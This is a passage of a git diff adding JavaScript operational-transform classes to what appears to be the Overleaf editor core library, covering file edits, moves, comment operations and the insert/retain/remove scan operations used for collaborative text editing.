StringFileData from '../file_data/string_file_data' + * @import { RawDeleteCommentOperation } from '../types' + */ + +/** + * @extends EditOperation + */ +class DeleteCommentOperation extends EditOperation { + /** + * @param {string} commentId + */ + constructor(commentId) { + super() + this.commentId = commentId + } + + /** + * @inheritdoc + * @returns {RawDeleteCommentOperation} + */ + toJSON() { + return { + deleteComment: this.commentId, + } + } + + /** + * @inheritdoc + * @param {StringFileData} fileData + */ + apply(fileData) { + fileData.comments.delete(this.commentId) + } + + /** + * @inheritdoc + * @param {StringFileData} previousState + * @returns {AddCommentOperation | EditNoOperation} + */ + invert(previousState) { + const comment = previousState.comments.getComment(this.commentId) + if (!comment) { + return new EditNoOperation() + } + + return new core.AddCommentOperation( + comment.id, + comment.ranges.slice(), + comment.resolved + ) + } + + /** + * @inheritdoc + * @param {RawDeleteCommentOperation} raw + * @returns {DeleteCommentOperation} + */ + static fromJSON(raw) { + return new DeleteCommentOperation(raw.deleteComment) + } +} + +module.exports = DeleteCommentOperation diff --git a/libraries/overleaf-editor-core/lib/operation/edit_file_operation.js b/libraries/overleaf-editor-core/lib/operation/edit_file_operation.js new file mode 100644 index 0000000..8505b8a --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_file_operation.js @@ -0,0 +1,105 @@ +// @ts-check +'use strict' +/** + * @import EditOperation from './edit_operation' + * @import { RawEditFileOperation } from '../types' + * @import Snapshot from "../snapshot" + */ + +const Operation = require('./') +const EditOperationBuilder = require('./edit_operation_builder') + +/** + * Edit a file in place. It is a wrapper around a single EditOperation. + */ +class EditFileOperation extends Operation { + /** + * @param {string} pathname + * @param {EditOperation} operation + */ + constructor(pathname, operation) { + super() + this.pathname = pathname + this.operation = operation + } + + /** + * @inheritdoc + */ + toRaw() { + return { + pathname: this.pathname, + ...this.operation.toJSON(), + } + } + + /** + * Deserialize an EditFileOperation. + * + * @param {RawEditFileOperation} raw + * @return {EditFileOperation} + */ + static fromRaw(raw) { + return new EditFileOperation( + raw.pathname, + EditOperationBuilder.fromJSON(raw) + ) + } + + getPathname() { + return this.pathname + } + + getOperation() { + return this.operation + } + + /** + * @inheritdoc + * @param {Snapshot} snapshot + */ + applyTo(snapshot) { + // TODO(das7pad): can we teach typescript our polymorphism? + // @ts-ignore + snapshot.editFile(this.pathname, this.operation) + } + + /** + * @inheritdoc + * @param {Operation} other + * @return {boolean} + */ + canBeComposedWithForUndo(other) { + return ( + this.canBeComposedWith(other) && + this.operation.canBeComposedWithForUndo(other.operation) + ) + } + + /** + * @inheritdoc + * @param {Operation} other + * @return {other is EditFileOperation} + */ + canBeComposedWith(other) { + // Ensure that other operation is an edit file operation + if (!(other instanceof EditFileOperation)) return false + // Ensure that both operations are editing the same file + if (this.getPathname() !== other.getPathname()) return false + + return this.operation.canBeComposedWith(other.operation) + } + + /** + * @inheritdoc + * @param {EditFileOperation} other + */ + compose(other) { + return new EditFileOperation( + this.pathname, + this.operation.compose(other.operation) + ) + } +} + +module.exports = EditFileOperation diff --git a/libraries/overleaf-editor-core/lib/operation/edit_no_operation.js b/libraries/overleaf-editor-core/lib/operation/edit_no_operation.js new file mode 100644 index 0000000..81eae0d --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_no_operation.js @@ -0,0 +1,29 @@ +const EditOperation = require('./edit_operation') + +/** + * @import { RawEditNoOperation } from '../types' + */ + +class EditNoOperation extends EditOperation { + /** + * @inheritdoc + * @param {StringFileData} fileData + */ + apply(fileData) {} + + /** + * @inheritdoc + * @returns {RawEditNoOperation} + */ + toJSON() { + return { + noOp: true, + } + } + + static fromJSON() { + return new EditNoOperation() + } +} + +module.exports = EditNoOperation diff --git a/libraries/overleaf-editor-core/lib/operation/edit_operation.js b/libraries/overleaf-editor-core/lib/operation/edit_operation.js new file mode 100644 index 0000000..5058bb0 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_operation.js @@ -0,0 +1,91 @@ +// @ts-check +/** + * @import FileData from '../file_data' + * @import { RawEditOperation } from '../types' + */ + +class EditOperation { + constructor() { + if (this.constructor === EditOperation) { + throw new Error('Cannot instantiate abstract class') + } + } + + /** + * Converts operation into a JSON value. + * @returns {RawEditOperation} + */ + toJSON() { + throw new Error('Abstract method not implemented') + } + + /** + * @abstract + * @param {FileData} fileData + */ + apply(fileData) { + throw new Error('Abstract method not implemented') + } + + /** + * Determine the effect of this operation on the length of the text. + * + * NB: This is an Overleaf addition to the original OT system. + * + * @param {number} length of the original string; non-negative + * @return {number} length of the new string; non-negative + */ + applyToLength(length) { + return length + } + + /** + * Computes the inverse of an operation. The inverse of an operation is the + * operation that reverts the effects of the operation, e.g. when you have an + * operation 'insert("hello "); skip(6);' then the inverse is 'remove("hello "); + * skip(6);'. The inverse should be used for implementing undo. + * @param {FileData} previousState + * @returns {EditOperation} + */ + invert(previousState) { + throw new Error('Abstract method not implemented') + } + + /** + * + * @param {EditOperation} other + * @returns {boolean} + */ + canBeComposedWith(other) { + return false + } + + /** + * When you use ctrl-z to undo your latest changes, you expect the program not + * to undo every single keystroke but to undo your last sentence you wrote at + * a stretch or the deletion you did by holding the backspace key down. This + * This can be implemented by composing operations on the undo stack. This + * method can help decide whether two operations should be composed. It + * returns true if the operations are consecutive insert operations or both + * operations delete text at the same position. You may want to include other + * factors like the time since the last change in your decision. + * @param {EditOperation} other + */ + canBeComposedWithForUndo(other) { + return false + } + + /** + * Compose merges two consecutive operations into one operation, that + * preserves the changes of both. Or, in other words, for each input string S + * and a pair of consecutive operations A and B, + * apply(apply(S, A), B) = apply(S, compose(A, B)) must hold. + * @param {EditOperation} other + * @returns {EditOperation} + */ + compose(other) { + throw new Error('Abstract method not implemented') + } +} + +module.exports = EditOperation diff --git a/libraries/overleaf-editor-core/lib/operation/edit_operation_builder.js b/libraries/overleaf-editor-core/lib/operation/edit_operation_builder.js new file mode 100644 index 0000000..febdebc --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_operation_builder.js @@ -0,0 +1,93 @@ +// @ts-check + +/** + * @import EditOperation from './edit_operation' + * @import { RawTextOperation, RawAddCommentOperation, RawEditOperation } from '../types' + * @import { RawDeleteCommentOperation, RawSetCommentStateOperation } from '../types' + */ + +const DeleteCommentOperation = require('./delete_comment_operation') +const AddCommentOperation = require('./add_comment_operation') +const TextOperation = require('./text_operation') +const SetCommentStateOperation = require('./set_comment_state_operation') +const EditNoOperation = require('./edit_no_operation') + +class EditOperationBuilder { + /** + * + * @param {RawEditOperation} raw + * @returns {EditOperation} + */ + static fromJSON(raw) { + if (isTextOperation(raw)) { + return TextOperation.fromJSON(raw) + } + if (isRawAddCommentOperation(raw)) { + return AddCommentOperation.fromJSON(raw) + } + if (isRawDeleteCommentOperation(raw)) { + return DeleteCommentOperation.fromJSON(raw) + } + if (isRawSetCommentStateOperation(raw)) { + return SetCommentStateOperation.fromJSON(raw) + } + if (isRawEditNoOperation(raw)) { + return EditNoOperation.fromJSON() + } + throw new Error('Unsupported operation in EditOperationBuilder.fromJSON') + } +} + +/** + * @param {unknown} raw + * @returns {raw is RawTextOperation} + */ +function isTextOperation(raw) { + return raw !== null && typeof raw === 'object' && 'textOperation' in raw +} + +/** + * @param {unknown} raw + * @returns {raw is RawAddCommentOperation} + */ +function isRawAddCommentOperation(raw) { + return ( + raw !== null && + typeof raw === 'object' && + 'commentId' in raw && + 'ranges' in raw && + Array.isArray(raw.ranges) + ) +} + +/** + * @param {unknown} raw + * @returns {raw is RawDeleteCommentOperation} + */ +function isRawDeleteCommentOperation(raw) { + return raw !== null && typeof raw === 'object' && 'deleteComment' in raw +} + +/** + * @param {unknown} raw + * @returns {raw is RawSetCommentStateOperation} + */ +function isRawSetCommentStateOperation(raw) { + return ( + raw !== null && + typeof raw === 'object' && + 'commentId' in raw && + 'resolved' in raw && + typeof raw.resolved === 'boolean' + ) +} + +/** + * @param {unknown} raw + * @returns {raw is RawEditNoOperation} + */ +function isRawEditNoOperation(raw) { + return raw !== null && typeof raw === 'object' && 'noOp' in raw +} + +module.exports = EditOperationBuilder diff --git a/libraries/overleaf-editor-core/lib/operation/edit_operation_transformer.js b/libraries/overleaf-editor-core/lib/operation/edit_operation_transformer.js new file mode 100644 index 0000000..c82393c --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/edit_operation_transformer.js @@ -0,0 +1,162 @@ +// @ts-check +const core = require('../..') +const Comment = require('../comment') +const EditNoOperation = require('./edit_no_operation') +const TextOperation = require('./text_operation') + +/** + * @import EditOperation from './edit_operation' + */ + +class EditOperationTransformer { + /** + * Transform two edit operations against each other. + * @param {EditOperation} a + * @param {EditOperation} b + * @returns {[EditOperation, EditOperation]} + */ + static transform(a, b) { + const { + AddCommentOperation, + DeleteCommentOperation, + SetCommentStateOperation, + } = core + + if (a instanceof EditNoOperation || b instanceof EditNoOperation) { + return [a, b] + } + + const transformers = [ + createTransformer(TextOperation, TextOperation, TextOperation.transform), + createTransformer(TextOperation, DeleteCommentOperation, noConflict), + createTransformer(TextOperation, SetCommentStateOperation, noConflict), + createTransformer(TextOperation, AddCommentOperation, (a, b) => { + // apply the text operation to the comment + const originalComment = new Comment(b.commentId, b.ranges, b.resolved) + const movedComment = originalComment.applyTextOperation(a, b.commentId) + return [ + a, + new AddCommentOperation( + movedComment.id, + movedComment.ranges, + movedComment.resolved + ), + ] + }), + createTransformer(AddCommentOperation, AddCommentOperation, (a, b) => { + if (a.commentId === b.commentId) { + return [new EditNoOperation(), b] + } + return [a, b] + }), + createTransformer(AddCommentOperation, DeleteCommentOperation, (a, b) => { + if (a.commentId === b.commentId) { + // delete wins + return [new EditNoOperation(), b] + } + return [a, b] + }), + createTransformer( + AddCommentOperation, + SetCommentStateOperation, + (a, b) => { + if (a.commentId === b.commentId) { + const newA = new AddCommentOperation( + a.commentId, + a.ranges, + b.resolved + ) + return [newA, b] + } + return [a, b] + } + ), + createTransformer( + DeleteCommentOperation, + DeleteCommentOperation, + (a, b) => { + if (a.commentId === b.commentId) { + // if both operations delete the same comment, we can ignore both + return [new EditNoOperation(), new EditNoOperation()] + } + return [a, b] + } + ), + createTransformer( + DeleteCommentOperation, + SetCommentStateOperation, + (a, b) => { + if (a.commentId === b.commentId) { + // delete wins + return [a, new EditNoOperation()] + } + return [a, b] + } + ), + createTransformer( + SetCommentStateOperation, + SetCommentStateOperation, + (a, b) => { + if (a.commentId !== b.commentId) { + return [a, b] + } + + if (a.resolved === b.resolved) { + return [new EditNoOperation(), new EditNoOperation()] + } + + const shouldResolve = a.resolved && b.resolved + if (a.resolved === shouldResolve) { + return [a, new EditNoOperation()] + } else { + return [new EditNoOperation(), b] + } + } + ), + ] + + for (const transformer of transformers) { + const result = transformer(a, b) + if (result) { + return result + } + } + + throw new Error( + `Transform not implemented for ${a.constructor.name}○${b.constructor.name}` + ) + } +} + +/** + * @template {EditOperation} X + * @template {EditOperation} Y + * @param {new(...args: any[]) => X} ClassA + * @param {new(...args: any[]) => Y} ClassB + * @param {(a: X, b: Y) => [EditOperation, EditOperation]} transformer + * @returns {(a: EditOperation, b: EditOperation) => [EditOperation, EditOperation] | false} + */ +function createTransformer(ClassA, ClassB, transformer) { + return (a, b) => { + if (a instanceof ClassA && b instanceof ClassB) { + return transformer(a, b) + } + if (b instanceof ClassA && a instanceof ClassB) { + const [bPrime, aPrime] = transformer(b, a) + return [aPrime, bPrime] + } + return false + } +} + +/** + * + * @param {EditOperation} a + * @param {EditOperation} b + * @returns {[EditOperation, EditOperation]} + */ +function noConflict(a, b) { + return [a, b] +} + +module.exports = EditOperationTransformer diff --git a/libraries/overleaf-editor-core/lib/operation/index.js b/libraries/overleaf-editor-core/lib/operation/index.js new file mode 100644 index 0000000..ebc6f73 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/index.js @@ -0,0 +1,462 @@ +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert +const EditOperationTransformer = require('./edit_operation_transformer') + +// Dependencies are loaded at the bottom of the file to mitigate circular +// dependency +let NoOperation = null +let AddFileOperation = null +let MoveFileOperation = null +let EditFileOperation = null +let SetFileMetadataOperation = null + +/** + * @import { BlobStore } from "../types" + * @import Snapshot from "../snapshot" + */ + +/** + * An `Operation` changes a `Snapshot` when it is applied. See the + * {@tutorial OT} tutorial for background. + */ +class Operation { + /** + * Deserialize an Operation. + * + * @param {Object} raw + * @return {Operation} one of the subclasses + */ + static fromRaw(raw) { + if ('file' in raw) { + return AddFileOperation.fromRaw(raw) + } + if ( + 'textOperation' in raw || + 'commentId' in raw || + 'deleteComment' in raw + ) { + return EditFileOperation.fromRaw(raw) + } + if ('newPathname' in raw) { + return new MoveFileOperation(raw.pathname, raw.newPathname) + } + if ('metadata' in raw) { + return new SetFileMetadataOperation(raw.pathname, raw.metadata) + } + if (_.isEmpty(raw)) { + return new NoOperation() + } + throw new Error('invalid raw operation ' + JSON.stringify(raw)) + } + + /** + * Serialize an Operation. + * + * @return {Object} + */ + toRaw() { + return {} + } + + /** + * Whether this operation does nothing when applied. + * + * @return {Boolean} + */ + isNoOp() { + return false + } + + /** + * If this Operation references blob hashes, add them to the given Set. + * + * @param {Set.} blobHashes + */ + findBlobHashes(blobHashes) {} + + /** + * If this operation references any files, load the files. + * + * @param {string} kind see {File#load} + * @param {BlobStore} blobStore + * @return {Promise} + */ + async loadFiles(kind, blobStore) {} + + /** + * Return a version of this operation that is suitable for long term storage. + * In most cases, we just need to convert the operation to raw form, but if + * the operation involves File objects, we may need to store their content. + * + * @param {BlobStore} blobStore + * @return {Promise.} + */ + async store(blobStore) { + return this.toRaw() + } + + /** + * Apply this Operation to a snapshot. + * + * The snapshot is modified in place. + * + * @param {Snapshot} snapshot + */ + applyTo(snapshot) { + assert.object(snapshot, 'bad snapshot') + } + + /** + * Whether this operation can be composed with another operation to produce a + * single operation of the same type as this one, while keeping the composed + * operation small and logical enough to be used in the undo stack. + * + * @param {Operation} other + * @return {Boolean} + */ + canBeComposedWithForUndo(other) { + return false + } + + /** + * Whether this operation can be composed with another operation to produce a + * single operation of the same type as this one. + * + * TODO Moves can be composed. For example, if you rename a to b and then decide + * shortly after that actually you want to call it c, we could compose the two + * to get a -> c). Edits can also be composed --- see rules in TextOperation. + * We also need to consider the Change --- we will need to consider both time + * and author(s) when composing changes. I guess that AddFile can also be + * composed in some cases --- if you upload a file and then decide it was the + * wrong one and upload a new one, we could drop the one in the middle, but + * that seems like a pretty rare case. + * + * @param {Operation} other + * @return {Boolean} + */ + canBeComposedWith(other) { + return false + } + + /** + * Compose this operation with another operation to produce a single operation + * of the same type as this one. + * + * @param {Operation} other + * @return {Operation} + */ + compose(other) { + throw new Error('not implemented') + } + + /** + * Transform takes two operations A and B that happened concurrently and + * produces two operations A' and B' (in an array) such that + * `apply(apply(S, A), B') = apply(apply(S, B), A')`. + * + * That is, if one client applies A and then B', they get the same result as + * another client who applies B and then A'. + * + * @param {Operation} a + * @param {Operation} b + * @return {Operation[]} operations `[a', b']` + */ + static transform(a, b) { + if (a.isNoOp() || b.isNoOp()) return [a, b] + + function transpose(transformer) { + return transformer(b, a).reverse() + } + + const bIsAddFile = b instanceof AddFileOperation + const bIsEditFile = b instanceof EditFileOperation + const bIsMoveFile = b instanceof MoveFileOperation + const bIsSetFileMetadata = b instanceof SetFileMetadataOperation + + if (a instanceof AddFileOperation) { + if (bIsAddFile) return transformAddFileAddFile(a, b) + if (bIsMoveFile) return transformAddFileMoveFile(a, b) + if (bIsEditFile) return transformAddFileEditFile(a, b) + if (bIsSetFileMetadata) return transformAddFileSetFileMetadata(a, b) + throw new Error('bad op b') + } + if (a instanceof MoveFileOperation) { + if (bIsAddFile) return transpose(transformAddFileMoveFile) + if (bIsMoveFile) return transformMoveFileMoveFile(a, b) + if (bIsEditFile) return transformMoveFileEditFile(a, b) + if (bIsSetFileMetadata) return transformMoveFileSetFileMetadata(a, b) + throw new Error('bad op b') + } + if (a instanceof EditFileOperation) { + if (bIsAddFile) return transpose(transformAddFileEditFile) + if (bIsMoveFile) return transpose(transformMoveFileEditFile) + if (bIsEditFile) return transformEditFileEditFile(a, b) + if (bIsSetFileMetadata) return transformEditFileSetFileMetadata(a, b) + throw new Error('bad op b') + } + if (a instanceof SetFileMetadataOperation) { + if (bIsAddFile) return transpose(transformAddFileSetFileMetadata) + if (bIsMoveFile) return transpose(transformMoveFileSetFileMetadata) + if (bIsEditFile) return transpose(transformEditFileSetFileMetadata) + if (bIsSetFileMetadata) return transformSetFileMetadatas(a, b) + throw new Error('bad op b') + } + throw new Error('bad op a') + } + + /** + * Transform each operation in `a` by each operation in `b` and save the primed + * operations in place. + * + * @param {Array.} as - modified in place + * @param {Array.} bs - modified in place + */ + static transformMultiple(as, bs) { + for (let i = 0; i < as.length; ++i) { + for (let j = 0; j < bs.length; ++j) { + const primes = Operation.transform(as[i], bs[j]) + as[i] = primes[0] + bs[j] = primes[1] + } + } + } + + static addFile(pathname, file) { + return new AddFileOperation(pathname, file) + } + + static editFile(pathname, editOperation) { + return new EditFileOperation(pathname, editOperation) + } + + static moveFile(pathname, newPathname) { + return new MoveFileOperation(pathname, newPathname) + } + + static removeFile(pathname) { + return new MoveFileOperation(pathname, '') + } + + static setFileMetadata(pathname, metadata) { + return new SetFileMetadataOperation(pathname, metadata) + } +} + +// +// Transform +// +// The way to read these transform functions is that +// 1. return_value[0] is the op to be applied after arguments[1], and +// 2. return_value[1] is the op to be applied after arguments[0], +// in order to arrive at the same project state. +// + +function transformAddFileAddFile(add1, add2) { + if (add1.getPathname() === add2.getPathname()) { + return [Operation.NO_OP, add2] // add2 wins + } + + return [add1, add2] +} + +function transformAddFileMoveFile(add, move) { + function relocateAddFile() { + return new AddFileOperation(move.getNewPathname(), add.getFile().clone()) + } + + if (add.getPathname() === move.getPathname()) { + if (move.isRemoveFile()) { + return [add, Operation.NO_OP] + } + return [ + relocateAddFile(), + new MoveFileOperation(add.getPathname(), move.getNewPathname()), + ] + } + + if (add.getPathname() === move.getNewPathname()) { + return [relocateAddFile(), new MoveFileOperation(move.getPathname(), '')] + } + + return [add, move] +} + +function transformAddFileEditFile(add, edit) { + if (add.getPathname() === edit.getPathname()) { + return [add, Operation.NO_OP] // the add wins + } + + return [add, edit] +} + +function transformAddFileSetFileMetadata(add, set) { + if (add.getPathname() === set.getPathname()) { + const newFile = add.getFile().clone() + newFile.setMetadata(set.getMetadata()) + return [new AddFileOperation(add.getPathname(), newFile), set] + } + + return [add, set] +} + +// +// This is one of the trickier ones. There are 15 possible equivalence +// relationships between our four variables: +// +// path1, newPath1, path2, newPath2 --- "same move" (all equal) +// +// path1, newPath1, path2 | newPath2 --- "no-ops" (1) +// path1, newPath1, newPath2 | path2 --- "no-ops" (1) +// path1, path2, newPath2 | newPath1 --- "no-ops" (2) +// newPath1, path2, newPath2 | path1 --- "no-ops" (2) +// +// path1, newPath1 | path2, newPath2 --- "no-ops" (1 and 2) +// path1, path2 | newPath1, newPath2 --- "same move" +// path1, newPath2 | newPath1, path2 --- "opposite moves" +// +// path1, newPath1 | path2 | newPath2 --- "no-ops" (1) +// path1, path2 | newPath1 | newPath2 --- "divergent moves" +// path1, newPath2 | newPath1 | path2 --- "transitive move" +// newPath1, path2 | path1 | newPath2 --- "transitive move" +// newPath1, newPath2 | path1 | path2 --- "convergent move" +// path2, newPath2 | path1 | newPath1 --- "no-ops" (2) +// +// path1 | newPath1 | path2 | newPath2 --- "no conflict" +// +function transformMoveFileMoveFile(move1, move2) { + const path1 = move1.getPathname() + const path2 = move2.getPathname() + const newPath1 = move1.getNewPathname() + const newPath2 = move2.getNewPathname() + + // the same move + if (path1 === path2 && newPath1 === newPath2) { + return [Operation.NO_OP, Operation.NO_OP] + } + + // no-ops + if (path1 === newPath1 && path2 === newPath2) { + return [Operation.NO_OP, Operation.NO_OP] + } + if (path1 === newPath1) { + return [Operation.NO_OP, move2] + } + if (path2 === newPath2) { + return [move1, Operation.NO_OP] + } + + // opposite moves (foo -> bar, bar -> foo) + if (path1 === newPath2 && path2 === newPath1) { + // We can't handle this very well: if we wanted move2 (say) to win, move2' + // would have to be addFile(foo) with the content of bar, but we don't have + // the content of bar available here. So, we just destroy both files. + return [Operation.removeFile(path1), Operation.removeFile(path2)] + } + + // divergent moves (foo -> bar, foo -> baz); convention: move2 wins + if (path1 === path2 && newPath1 !== newPath2) { + return [Operation.NO_OP, Operation.moveFile(newPath1, newPath2)] + } + + // convergent move (foo -> baz, bar -> baz); convention: move2 wins + if (newPath1 === newPath2 && path1 !== path2) { + return [Operation.removeFile(path1), move2] + } + + // transitive move: + // 1: foo -> baz, 2: bar -> foo (result: bar -> baz) or + // 1: foo -> bar, 2: bar -> baz (result: foo -> baz) + if (path1 === newPath2 && newPath1 !== path2) { + return [ + Operation.moveFile(newPath2, newPath1), + Operation.moveFile(path2, newPath1), + ] + } + if (newPath1 === path2 && path1 !== newPath2) { + return [ + Operation.moveFile(path1, newPath2), + Operation.moveFile(newPath1, newPath2), + ] + } + + // no conflict + return [move1, move2] +} + +function transformMoveFileEditFile(move, edit) { + if (move.getPathname() === edit.getPathname()) { + if (move.isRemoveFile()) { + // let the remove win + return [move, Operation.NO_OP] + } + return [ + move, + Operation.editFile(move.getNewPathname(), edit.getOperation()), + ] + } + + if (move.getNewPathname() === edit.getPathname()) { + // let the move win + return [move, Operation.NO_OP] + } + + return [move, edit] +} + +function transformMoveFileSetFileMetadata(move, set) { + if (move.getPathname() === set.getPathname()) { + return [ + move, + Operation.setFileMetadata(move.getNewPathname(), set.getMetadata()), + ] + } + // A: mv foo -> bar + // B: set bar.x + // + // A': mv foo -> bar + // B': nothing + if (move.getNewPathname() === set.getPathname()) { + return [move, Operation.NO_OP] // let the move win + } + return [move, set] +} + +function transformEditFileEditFile(edit1, edit2) { + if (edit1.getPathname() === edit2.getPathname()) { + const primeOps = EditOperationTransformer.transform( + edit1.getOperation(), + edit2.getOperation() + ) + return [ + Operation.editFile(edit1.getPathname(), primeOps[0]), + Operation.editFile(edit2.getPathname(), primeOps[1]), + ] + } + + return [edit1, edit2] +} + +function transformEditFileSetFileMetadata(edit, set) { + // There is no conflict. + return [edit, set] +} + +function transformSetFileMetadatas(set1, set2) { + if (set1.getPathname() === set2.getPathname()) { + return [Operation.NO_OP, set2] // set2 wins + } + return [set1, set2] +} + +module.exports = Operation + +// Work around circular import +NoOperation = require('./no_operation') +AddFileOperation = require('./add_file_operation') +MoveFileOperation = require('./move_file_operation') +EditFileOperation = require('./edit_file_operation') +SetFileMetadataOperation = require('./set_file_metadata_operation') + +Operation.NO_OP = new NoOperation() diff --git a/libraries/overleaf-editor-core/lib/operation/move_file_operation.js b/libraries/overleaf-editor-core/lib/operation/move_file_operation.js new file mode 100644 index 0000000..85e3707 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/move_file_operation.js @@ -0,0 +1,54 @@ +'use strict' + +const Operation = require('./') + +/** + * Moves or removes a file from a project. + */ +class MoveFileOperation extends Operation { + /** + * @param {string} pathname + * @param {string} newPathname + */ + constructor(pathname, newPathname) { + super() + this.pathname = pathname + this.newPathname = newPathname + } + + /** + * @inheritdoc + */ + toRaw() { + return { + pathname: this.pathname, + newPathname: this.newPathname, + } + } + + getPathname() { + return this.pathname + } + + getNewPathname() { + return this.newPathname + } + + /** + * Whether this operation is a MoveFile operation that deletes the file. + * + * @return {boolean} + */ + isRemoveFile() { + return this.getNewPathname() === '' + } + + /** + * @inheritdoc + */ + applyTo(snapshot) { + snapshot.moveFile(this.getPathname(), this.getNewPathname()) + } +} + +module.exports = MoveFileOperation diff --git a/libraries/overleaf-editor-core/lib/operation/no_operation.js b/libraries/overleaf-editor-core/lib/operation/no_operation.js new file mode 100644 index 0000000..4c79665 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/no_operation.js @@ -0,0 +1,20 @@ +'use strict' + +const Operation = require('./') + +/** + * An explicit no-operation. + * + * There are several no-ops, such as moving a file to itself, but it's useful + * to have a generic no-op as well. + */ +class NoOperation extends Operation { + /** + * @inheritdoc + */ + isNoOp() { + return true + } +} + +module.exports = NoOperation diff --git a/libraries/overleaf-editor-core/lib/operation/scan_op.js b/libraries/overleaf-editor-core/lib/operation/scan_op.js new file mode 100644 index 0000000..4f179f2 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/operation/scan_op.js @@ -0,0 +1,457 @@ +// @ts-check +const { containsNonBmpChars } = require('../util') +const { + ApplyError, + InvalidInsertionError, + UnprocessableError, +} = require('../errors') +const ClearTrackingProps = require('../file_data/clear_tracking_props') +const TrackingProps = require('../file_data/tracking_props') + +/** + * @import { RawScanOp, RawInsertOp, RawRetainOp, RawRemoveOp, TrackingDirective } from '../types' + * + * @typedef {{ length: number, inputCursor: number, readonly inputLength: number}} LengthApplyContext + */ + +class ScanOp { + constructor() { + if (this.constructor === ScanOp) { + throw new Error('Cannot instantiate abstract class') + } + } + + /** + * Applies an operation to a length + * @param {LengthApplyContext} current + * @returns {LengthApplyContext} + */ + applyToLength(current) { + throw new Error('abstract method') + } + + /** + * @returns {RawScanOp} + */ + toJSON() { + throw new Error('abstract method') + } + + /** + * @param {RawScanOp} raw + * @returns {ScanOp} + */ + static fromJSON(raw) { + if (isRetain(raw)) { + return RetainOp.fromJSON(raw) + } else if (isInsert(raw)) { + return InsertOp.fromJSON(raw) + } else if (isRemove(raw)) { + return RemoveOp.fromJSON(raw) + } + throw new UnprocessableError(`Invalid ScanOp ${JSON.stringify(raw)}`) + } + + /** + * Tests whether two ScanOps are equal + * @param {ScanOp} _other + * @returns {boolean} + */ + equals(_other) { + return false + } + + /** + * Tests whether two ScanOps can be merged into a single operation + * @param {ScanOp} other + * @returns + */ + canMergeWith(other) { + return false + } + + /** + * Merge two ScanOps into a single operation + * @param {ScanOp} _other + * @returns {void} + */ + mergeWith(_other) { + throw new Error('abstract method') + } + + toString() { + 'ScanOp' + } +} + +class InsertOp extends ScanOp { + /** + * + * @param {string} insertion + * @param {TrackingProps | undefined} tracking + * @param {string[] | undefined} commentIds + */ + constructor(insertion, tracking = undefined, commentIds = undefined) { + super() + if (typeof insertion !== 'string') { + throw new InvalidInsertionError('insertion must be a string') + } + if (containsNonBmpChars(insertion)) { + throw new InvalidInsertionError('insertion contains non-BMP characters') + } + /** @type {string} */ + this.insertion = insertion + /** @type {TrackingProps | undefined} */ + this.tracking = tracking + /** @type {string[] | undefined} */ + this.commentIds = commentIds + } + + /** + * + * @param {RawInsertOp} op + * @returns {InsertOp} + */ + static fromJSON(op) { + if (typeof op === 'string') { + return new InsertOp(op) + } + // It must be an object with an 'i' property. + if (typeof op.i !== 'string') { + throw new InvalidInsertionError( + 'insert operation must have a string property' + ) + } + return new InsertOp( + op.i, + op.tracking && TrackingProps.fromRaw(op.tracking), + op.commentIds + ) + } + + /** + * @inheritdoc + * @param {LengthApplyContext} current + * @returns {LengthApplyContext} + */ + applyToLength(current) { + current.length += this.insertion.length + return current + } + + /** @inheritdoc + * @param {ScanOp} other + */ + equals(other) { + if (!(other instanceof InsertOp)) { + return false + } + if (this.insertion !== other.insertion) { + return false + } + if (this.tracking) { + if (!this.tracking.equals(other.tracking)) { + return false + } + } else if (other.tracking) { + return false + } + + if (this.commentIds) { + return ( + this.commentIds.length === other.commentIds?.length && + this.commentIds.every(id => other.commentIds?.includes(id)) + ) + } + return !other.commentIds + } + + /** + * @param {ScanOp} other + * @return {other is InsertOp} + */ + canMergeWith(other) { + if (!(other instanceof InsertOp)) { + return false + } + if (this.tracking) { + if (!this.tracking.equals(other.tracking)) { + return false + } + } else if (other.tracking) { + return false + } + if (this.commentIds) { + return ( + this.commentIds.length === other.commentIds?.length && + this.commentIds.every(id => other.commentIds?.includes(id)) + ) + } + return !other.commentIds + } + + /** + * @param {ScanOp} other + */ + mergeWith(other) { + if (!this.canMergeWith(other)) { + throw new Error('Cannot merge with incompatible operation') + } + this.insertion += other.insertion + // We already have the same tracking info and commentIds + } + + /** + * @returns {RawInsertOp} + */ + toJSON() { + if (!this.tracking && !this.commentIds) { + return this.insertion + } + /** @type RawInsertOp */ + const obj = { i: this.insertion } + if (this.tracking) { + obj.tracking = this.tracking.toRaw() + } + if (this.commentIds) { + obj.commentIds = this.commentIds + } + return obj + } + + toString() { + return `insert '${this.insertion}'` + } +} + +class RetainOp extends ScanOp { + /** + * @param {number} length + * @param {TrackingDirective | undefined} tracking + */ + constructor(length, tracking = undefined) { + super() + if (length < 0) { + throw new Error('length must be non-negative') + } + /** @type {number} */ + this.length = length + /** @type {TrackingDirective | undefined} */ + this.tracking = tracking + } + + /** + * @inheritdoc + * @param {LengthApplyContext} current + * @returns {LengthApplyContext} + */ + applyToLength(current) { + if (current.inputCursor + this.length > current.inputLength) { + throw new ApplyError( + "Operation can't retain more chars than are left in the string.", + this.toJSON(), + current.inputLength + ) + } + current.length += this.length + current.inputCursor += this.length + return current + } + + /** + * + * @param {RawRetainOp} op + * @returns {RetainOp} + */ + static fromJSON(op) { + if (typeof op === 'number') { + return new RetainOp(op) + } + // It must be an object with a 'r' property. + if (typeof op.r !== 'number') { + throw new Error('retain operation must have a number property') + } + if (op.tracking) { + const tracking = + op.tracking.type === 'none' + ? new ClearTrackingProps() + : TrackingProps.fromRaw(op.tracking) + return new RetainOp(op.r, tracking) + } + return new RetainOp(op.r) + } + + /** @inheritdoc + * @param {ScanOp} other + */ + equals(other) { + if (!(other instanceof RetainOp)) { + return false + } + if (this.length !== other.length) { + return false + } + if (this.tracking) { + return this.tracking.equals(other.tracking) + } + return !other.tracking + } + + /** + * @param {ScanOp} other + * @return {other is RetainOp} + */ + canMergeWith(other) { + if (!(other instanceof RetainOp)) { + return false + } + if (this.tracking) { + return this.tracking.equals(other.tracking) + } + return !other.tracking + } + + /** + * 